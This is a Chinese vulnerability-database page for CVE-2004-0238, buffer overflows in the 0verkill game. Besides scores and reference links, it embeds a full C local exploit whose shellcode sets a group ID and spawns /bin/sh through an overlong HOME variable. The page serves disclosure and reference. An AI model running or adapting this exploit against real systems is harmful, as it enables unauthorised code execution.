CVE-2004-0238
CVSS7.2
发布时间 :2004-11-23 00:00:00
修订时间 :2016-10-17 22:42:13
NMCOES    

[原文]Multiple buffer overflows in Overkill (0verkill) 0.15pre3 might allow local users to execute arbitrary code in the client via a long HOME environment variable in the (1) load_cfg and (2) save_cfg functions; possibly allow remote attackers to execute arbitrary code via long strings to (3) the send_message function; and, in the server, via (4) the parse_command_line function.


[CNNVD]0verkill Game本地客户端多个缓冲区溢出漏洞(CNNVD-200411-141)

        Overkill (0verkill) 0.15pre3存在多个缓冲区溢出漏洞。本地用户可以借助(1)load_cfg以及(2)save_cfg函数中的一个超长HOME环境变量在客户端执行任意代码;远程攻击者可能可以借助指向(3)send_message函数;以及在服务器中,借助(4)parse_command_line函数的超长字符串执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0238
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0238
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-141
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/016579.html
(UNKNOWN)  FULLDISC  20040202 0verkill - little simple vulnerability.
http://marc.info/?l=bugtraq&m=107577335424509&w=2
(UNKNOWN)  BUGTRAQ  20040202 0verkill - little simple vulnerability.
http://www.securiteam.com/securitynews/5AP010KC0C.html
(UNKNOWN)  MISC  http://www.securiteam.com/securitynews/5AP010KC0C.html
http://www.securityfocus.com/bid/9550
(VENDOR_ADVISORY)  BID  9550
http://xforce.iss.net/xforce/xfdb/14999
(VENDOR_ADVISORY)  XF  overkill-client-multiple-bo(14999)
http://xforce.iss.net/xforce/xfdb/15000
(UNKNOWN)  XF  overkill-server-parsecommandline-bo(15000)

- 漏洞信息

0verkill Game本地客户端多个缓冲区溢出漏洞
高危 缓冲区溢出
2004-11-23 00:00:00 2006-09-28 00:00:00
远程※本地  
        Overkill (0verkill) 0.15pre3存在多个缓冲区溢出漏洞。本地用户可以借助(1)load_cfg以及(2)save_cfg函数中的一个超长HOME环境变量在客户端执行任意代码;远程攻击者可能可以借助指向(3)send_message函数;以及在服务器中,借助(4)parse_command_line函数的超长字符串执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (23634)

0verkill 0.16 Game Client Multiple Local Buffer Overflow Vulnerabilities (EDBID:23634)
linux local
2004-02-02 Verified
0 pi3ki31ny
N/A [点击下载]
source: http://www.securityfocus.com/bid/9550/info

The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client. 

/*
 * Simple local exploit for 0verkill by pi3 (pi3ki31ny)
 * Greetz: [greetz on my web] && other my friends (you know who you are)
 *
 *         ...::: -=[ www.pi3.int.pl ]=- :::...
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>

#define PATH "./0verkill"
#define BUFS 300

/*    ...::: -=[ www.pi3.int.pl ]=- :::...    */

char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68
\x3a"
                   "\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20
\x5d"
                   "\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69
\x68"
                   "\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68
\x3a\x3a"
                   "\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04
\xcd"
                   "\x80"

/*    setregid (20,20)    */

                   "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0
\x47"
                   "\xcd\x80"

/*    exec /bin/sh    */

                   "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62
\x69"
                   "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0
\x0b\xcd"
                   "\x80"

/*    exit(0)    */

                   "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";

long ret_ad(char *a1, char *a2) {

   return (0xbffffffa-strlen(a1)-strlen(a2));
}

int ussage(char *arg) {

   printf("\n\t...::: -=[ Simple exploit for 0verkill (by pi3) ]
=- :::...\n");
   printf("\n\tUssage:\n\t[+] %s [options]\n
            -? <this help screen>
            -o <offset>
            -p PATH\n\n",arg);
   exit(-1);
}

int main(int argc, char *argv[]) {

   long ret,*buf_addr;
   char *buf,*path=PATH;
   int i,opt,offset=0;
   FILE *fp;

   while((opt = getopt(argc,argv,"p:o:?")) != -1) {
         switch(opt) {

          case 'o':

            offset=atoi(optarg);
            break;

          case 'p':

            path=optarg;
            break;

          case '?':
          default:

            ussage(argv[0]);
            break;
         }
   }

   if ( (fp=fopen(path,"r"))==NULL) {
      printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);
      ussage(argv[0]);
   } fclose(fp);

   if (!(buf=(char*)malloc(BUFS))) {
      printf("\nI can\'t locate memory! - buf\n");
      exit(-1);
   }

   printf("\n\t...::: -=[ Simple exploit for 0verkill (by pi3) ]=- :::...\n");
   printf("\n\t[+] Bulding buffors!\n");

   ret=ret_ad(shellcode,path);
   ret+=offset;

   printf("\t[+] Using adres 0x%x\n",ret);

   buf_addr=(long*)buf;

   for(i=0;i<BUFS;i+=4) {
    *(buf_addr) = ret; buf_addr++;
   }
   memcpy(buf, shellcode, strlen(shellcode));

   printf("\nExecuting the vuln program - %s\n\n",path);

   setenv("HOME", buf, 1);
   execl(path,path, 0);
   return 0;
}

		

- 漏洞信息

6928
Overkill client.c Multiple Function Overflows
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-02-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

0verkill Game Client Multiple Local Buffer Overflow Vulnerabilities
Boundary Condition Error 9550
Yes Yes
2004-02-02 12:00:00 2009-07-12 02:06:00
Discovery of these vulnerabilities has been credited to "Adam Zabrocki" <pi3ki31ny@wp.pl>.

- 受影响的程序版本

0verkill 0verkill 0.16

- 漏洞讨论

The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client.

- 漏洞利用

The following proof of concept exploit has been supplied for Linux based systems.

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站